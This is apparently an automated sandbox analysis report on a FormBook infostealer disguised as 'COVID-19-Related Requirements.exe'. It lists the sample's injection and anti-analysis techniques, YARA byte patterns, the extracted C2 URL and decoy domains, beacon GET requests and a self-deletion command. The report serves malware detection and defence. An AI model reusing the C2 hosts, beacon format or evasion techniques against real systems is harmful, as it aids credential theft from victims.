
Analysis Report COVID-19-Related Requirements.exe

Overview

General Information

Sample Name: COVID-19-Related Requirements.exe
Analysis ID: 425178
MD5: 7efd588df5d918372c111708f02cc3ce
SHA1: de98b083ed7e8b78be25cacf0715d15dd04228f5
SHA256: de0011128191babcbdb339d2ab7f9568e0b12c5ebc00a99c235fea849885b6a1
Tags: COVID-19, exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • COVID-19-Related Requirements.exe (PID: 6852 cmdline: 'C:\Users\user\Desktop\COVID-19-Related Requirements.exe' MD5: 7EFD588DF5D918372C111708F02CC3CE)
    • COVID-19-Related Requirements.exe (PID: 6964 cmdline: {path} MD5: 7EFD588DF5D918372C111708F02CC3CE)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wscript.exe (PID: 4112 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 7075DD7B9BE8807FCA93ACD86F724884)
          • cmd.exe (PID: 5768 cmdline: /c del 'C:\Users\user\Desktop\COVID-19-Related Requirements.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.tiffanysbeautybling.com/cgsp/"], "decoy": ["dzxcsy.com", "communication-digitale.net", "darkspot.pro", "neighborschoicefranchise.com", "mujeresaprendices.com", "ryanita.com", "karmelbali.com", "lengzu.net", "archoneshop.com", "auszeit-online.com", "incredikit.com", "theostermangroup.com", "challengesbringsuccess.com", "thegoddogcure.com", "missshalae.com", "mulherviaje.com", "danieljosephmuldoon.com", "plantitasmke.com", "lyson.info", "boardwalkcafebeaufort.com", "genesisdrumco.com", "bynature4nature.com", "notesfromthelovewars.com", "klimabeyazesyatamiri.xyz", "micatholics4biden.com", "epicdentalacademy.com", "lucrarsemfronteiras.com", "fmgurbanoutlet.com", "tonkuik.fyi", "sfypband.com", "aspeneaterys.com", "obzophigkr.net", "portablesteamsaunas.com", "clubroyals.com", "658194.com", "samuelhere.com", "footfull.info", "riptidetutorials.com", "catanetwork.com", "nocodecrypto.com", "kisukine.com", "tag-less-poets.com", "juxrams.info", "thebrandvoicemagazine.com", "montanablogs.com", "productos-photon.com", "aibetech.com", "wg101.com", "coefficientinsurence.com", "arinasystem.com", "elgrabador.com", "thewanderers.info", "openbracketindia.com", "saya-pai.com", "healthyskepticmd.com", "lumberlandjsc.xyz", "chanelkonferenz.online", "ajretrobg.com", "libittu.com", "oneroofingnearme.com", "pyd.xyz", "aikookuyama1.com", "partners-net.com", "imrichardallan.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author (matched strings listed beneath each row)
0000000F.00000002.481749515.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000F.00000002.481749515.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.481749515.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18419:$sqlite3step: 68 34 1C 7B E1
  • 0x1852c:$sqlite3step: 68 34 1C 7B E1
  • 0x18448:$sqlite3text: 68 38 2A 90 C5
  • 0x1856d:$sqlite3text: 68 38 2A 90 C5
  • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
0000000F.00000002.484219002.0000000001960000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000F.00000002.484219002.0000000001960000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author (matched strings listed beneath each row)
15.2.COVID-19-Related Requirements.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
15.2.COVID-19-Related Requirements.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
15.2.COVID-19-Related Requirements.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18419:$sqlite3step: 68 34 1C 7B E1
  • 0x1852c:$sqlite3step: 68 34 1C 7B E1
  • 0x18448:$sqlite3text: 68 38 2A 90 C5
  • 0x1856d:$sqlite3text: 68 38 2A 90 C5
  • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
15.2.COVID-19-Related Requirements.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
15.2.COVID-19-Related Requirements.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 0000000F.00000002.481749515.0000000000400000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.tiffanysbeautybling.com/cgsp/"], "decoy": ["dzxcsy.com", "communication-digitale.net", "darkspot.pro", "neighborschoicefranchise.com", "mujeresaprendices.com", "ryanita.com", "karmelbali.com", "lengzu.net", "archoneshop.com", "auszeit-online.com", "incredikit.com", "theostermangroup.com", "challengesbringsuccess.com", "thegoddogcure.com", "missshalae.com", "mulherviaje.com", "danieljosephmuldoon.com", "plantitasmke.com", "lyson.info", "boardwalkcafebeaufort.com", "genesisdrumco.com", "bynature4nature.com", "notesfromthelovewars.com", "klimabeyazesyatamiri.xyz", "micatholics4biden.com", "epicdentalacademy.com", "lucrarsemfronteiras.com", "fmgurbanoutlet.com", "tonkuik.fyi", "sfypband.com", "aspeneaterys.com", "obzophigkr.net", "portablesteamsaunas.com", "clubroyals.com", "658194.com", "samuelhere.com", "footfull.info", "riptidetutorials.com", "catanetwork.com", "nocodecrypto.com", "kisukine.com", "tag-less-poets.com", "juxrams.info", "thebrandvoicemagazine.com", "montanablogs.com", "productos-photon.com", "aibetech.com", "wg101.com", "coefficientinsurence.com", "arinasystem.com", "elgrabador.com", "thewanderers.info", "openbracketindia.com", "saya-pai.com", "healthyskepticmd.com", "lumberlandjsc.xyz", "chanelkonferenz.online", "ajretrobg.com", "libittu.com", "oneroofingnearme.com", "pyd.xyz", "aikookuyama1.com", "partners-net.com", "imrichardallan.com"]}
Multi AV Scanner detection for submitted file
Source: COVID-19-Related Requirements.exe | Virustotal: Detection: 23%
Source: COVID-19-Related Requirements.exe | ReversingLabs: Detection: 25%
Yara detected FormBook
Source: Yara match | File source: 0000000F.00000002.481749515.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.484219002.0000000001960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.484584798.0000000001990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.597531412.0000000002F80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.597396184.0000000002F50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.434950366.0000000004299000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.596048220.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 15.2.COVID-19-Related Requirements.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.COVID-19-Related Requirements.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: COVID-19-Related Requirements.exe | Joe Sandbox ML: detected
Source: 15.2.COVID-19-Related Requirements.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: COVID-19-Related Requirements.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: COVID-19-Related Requirements.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wscript.pdbGCTL | source: COVID-19-Related Requirements.exe, 0000000F.00000002.485075034.00000000019E0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000010.00000000.460588172.0000000007CA0000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: COVID-19-Related Requirements.exe, 0000000F.00000002.485261731.0000000001AA0000.00000040.00000001.sdmp, wscript.exe, 00000013.00000002.598596904.0000000004E9F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: COVID-19-Related Requirements.exe, wscript.exe
Source: Binary string: wscript.pdb | source: COVID-19-Related Requirements.exe, 0000000F.00000002.485075034.00000000019E0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb | source: explorer.exe, 00000010.00000000.460588172.0000000007CA0000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 4x nop then pop edi

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.tiffanysbeautybling.com/cgsp/
Source: global traffic | HTTP traffic detected:
  GET /cgsp/?zR-4q=wCZjRreTETPxpz3yzi5aMK9lgrBwWrXWegbflPnh9KjaaDHMPgi5SZz4hafy+YGLKOgeKwGRDg==&hB0=D8yhC83P6d34H HTTP/1.1
  Host: www.portablesteamsaunas.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: Joe Sandbox View | IP Address: 52.58.78.16 52.58.78.16
Source: Joe Sandbox View | ASN Name: AMAZON-02US AMAZON-02US
Source: global traffic | HTTP traffic detected:
  GET /cgsp/?zR-4q=wCZjRreTETPxpz3yzi5aMK9lgrBwWrXWegbflPnh9KjaaDHMPgi5SZz4hafy+YGLKOgeKwGRDg==&hB0=D8yhC83P6d34H HTTP/1.1
  Host: www.portablesteamsaunas.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: unknown | DNS traffic detected: queries for: www.portablesteamsaunas.com
Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000010.00000000.435521033.000000000095C000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: COVID-19-Related Requirements.exe, 00000001.00000002.432559159.0000000001877000.00000004.00000040.sdmp | String found in binary or memory: http://www.fontbureau.comcom
Source: COVID-19-Related Requirements.exe, 00000001.00000002.432559159.0000000001877000.00000004.00000040.sdmp | String found in binary or memory: http://www.fontbureau.commQ
Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: wscript.exe, 00000013.00000002.600969129.000000000579F000.00000004.00000001.sdmp | String found in binary or memory: http://www.portablesteamsaunas.com
Source: wscript.exe, 00000013.00000002.600969129.000000000579F000.00000004.00000001.sdmp | String found in binary or memory: http://www.portablesteamsaunas.com/
Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: COVID-19-Related Requirements.exe, 00000001.00000002.439653802.0000000006280000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.464256328.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: COVID-19-Related Requirements.exe | String found in binary or memory: https://api.imgur.com/3/image/
Source: COVID-19-Related Requirements.exe | String found in binary or memory: https://api.imgur.com/oauth2/authorize?client_id=
Source: COVID-19-Related Requirements.exe | String found in binary or memory: https://api.imgur.com/oauth2/token

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 0000000F.00000002.481749515.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.484219002.0000000001960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.484584798.0000000001990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.597531412.0000000002F80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.597396184.0000000002F50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.434950366.0000000004299000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.596048220.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 15.2.COVID-19-Related Requirements.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.COVID-19-Related Requirements.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0000000F.00000002.481749515.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.481749515.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.484219002.0000000001960000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.484219002.0000000001960000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.484584798.0000000001990000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.484584798.0000000001990000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.597531412.0000000002F80000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.597531412.0000000002F80000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.597396184.0000000002F50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.597396184.0000000002F50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.434950366.0000000004299000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.434950366.0000000004299000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.596048220.0000000000B10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.596048220.0000000000B10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 15.2.COVID-19-Related Requirements.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.2.COVID-19-Related Requirements.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 15.2.COVID-19-Related Requirements.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.2.COVID-19-Related Requirements.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_0041A060 NtClose,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_0041A110 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_00419F30 NtCreateFile,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_00419FE0 NtReadFile,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_00419FDC NtReadFile,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B099A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B09910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B098F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B09860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B09840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B09A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B09A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B09A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B095D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B09540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B097A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B09780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B09710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B096E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B09660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B099D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B09950 NtQueueApcThread,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B098A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B09820 NtEnumerateKey,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B0B040 NtSuspendThread,
